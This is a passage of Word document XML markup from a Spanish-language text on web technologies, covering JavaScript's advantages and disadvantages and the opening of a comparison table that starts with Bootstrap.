        <w:t> es un robusto lenguaje de programación que puede ser aplicado a un documento </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tooltip="HTML: HTML (HyperText Markup Language) is a descriptive language that specifies webpage structure." w:history="1">
        <w:r w:rsidRPr="00012875">
          <w:t>HTML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:t xml:space="preserve"> y usado para crear interactividad dinámica en los sitios web. Fue inventado por Brendan Eich, co-fundador del proyecto Mozilla, Mozilla Foundation y la Corporación Mozilla. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Ventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Lenguaje de scripting seguro y fiable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Los script tienen capacidades limitadas, por razones de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">El código </w:t>
      </w:r>
      <w:r w:rsidR="00C85A3F" w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se ejecuta en el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Interfaces de Programación de Aplicaciones del Navegador (</w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tooltip="APIs: An API (Application Programming Interface) is a set of features and rules that exist inside a software program enabling interaction between the software and other items, such as other software or hardware." w:history="1">
        <w:r w:rsidRPr="00C85A3F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>APIs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">). APIs construidas dentro de los navegadores que ofrecen funcionalidades como crear dinámicamente contenido HTML y establecer estilos CSS, hasta </w:t>
      </w:r>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>capturar y manipular un vídeo desde la cámara web del usuario, o generar gráficos 3D y muestras de sonido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>APIs de Terceros, que permiten a los desarrolladores incorporar funcionalidades en sus sitios de otros proveedores de contenidos como Twitter o Facebook.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Marcos de trabajo y librerías de terceros que puedes aplicar a tu HTML para que puedas construir y publicar rápidamente sitios y aplicaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="200" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:t>Desventajas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Código visible por cualquier usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El código debe descargarse completamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="00C85A3F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="200"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Puede poner en riesgo la seguridad del sitio, con el actual problema llamado XSS (significa en inglés Cross Site Scripting renombrado a XSS por su similitud con las hojas de estilo </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r w:rsidRPr="00C85A3F">
          <w:rPr>
            <w:rFonts w:eastAsia="Calibri"/>
            <w:color w:val="00000A"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>CSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="004C1CB9">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:color w:val="00000A"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C1CB9" w:rsidRPr="004C1CB9" w:rsidRDefault="004C1CB9" w:rsidP="004C1CB9">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="004C1CB9" w:rsidRPr="004C1CB9">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00890B46" w:rsidRDefault="00890B46" w:rsidP="00890B46">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc514520844"/>
      <w:r w:rsidRPr="00890B46">
        <w:lastRenderedPageBreak/>
        <w:t>Nuevas tecn</w:t>
      </w:r>
      <w:r>
        <w:t>ologías web</w:t>
      </w:r>
      <w:r w:rsidR="004633DE">
        <w:t xml:space="preserve"> (Tabla comparativa)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="004633DE" w:rsidRDefault="004633DE" w:rsidP="004633DE"/>
    <w:p w:rsidR="004633DE" w:rsidRDefault="004633DE" w:rsidP="004633DE"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabladecuadrcula5oscura-nfasis5"/>
        <w:tblW w:w="17587"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Look w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5347"/>
        <w:gridCol w:w="4329"/>
        <w:gridCol w:w="3729"/>
        <w:gridCol w:w="2439"/>
        <w:gridCol w:w="1743"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="649"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4957" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>TECNOLOGÍA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>DEFINICIÓN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>VENTAJAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2497" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>TECNOLOGÍAS</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>QUE USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1772" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>LICENCIAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidTr="00DE74BD">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4957" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Bootstrap</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:lang w:eastAsia="es-MX"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6640022E" wp14:editId="40A07F72">
                  <wp:extent cx="2003612" cy="1667008"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="52" name="Imagen 52"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40904" cy="1698035"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4488" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:ind w:firstLine="709"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Bootstrap, es un framework originalmente creado por Twitter, que permite crear interfaces web con CSS y JavaScript, cuya particularidad es la de adaptar la interfaz del sitio web al tamaño del dispositivo en que se visualice. Es decir, el sitio web se adapta automáticamente al tamaño de una PC, una Tablet u otro dispositivo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3873" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Es compatible con la mayoría de navegadores web.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Sistema grid de 12 columnas.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE74BD">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Elementos CSS3 prefabricados: botones, alertas, formularios, tablas, set de iconos, etc.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DE74BD" w:rsidRPr="00DE74BD" w:rsidRDefault="00DE74BD" w:rsidP="00DE74BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:contextualSpacing/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
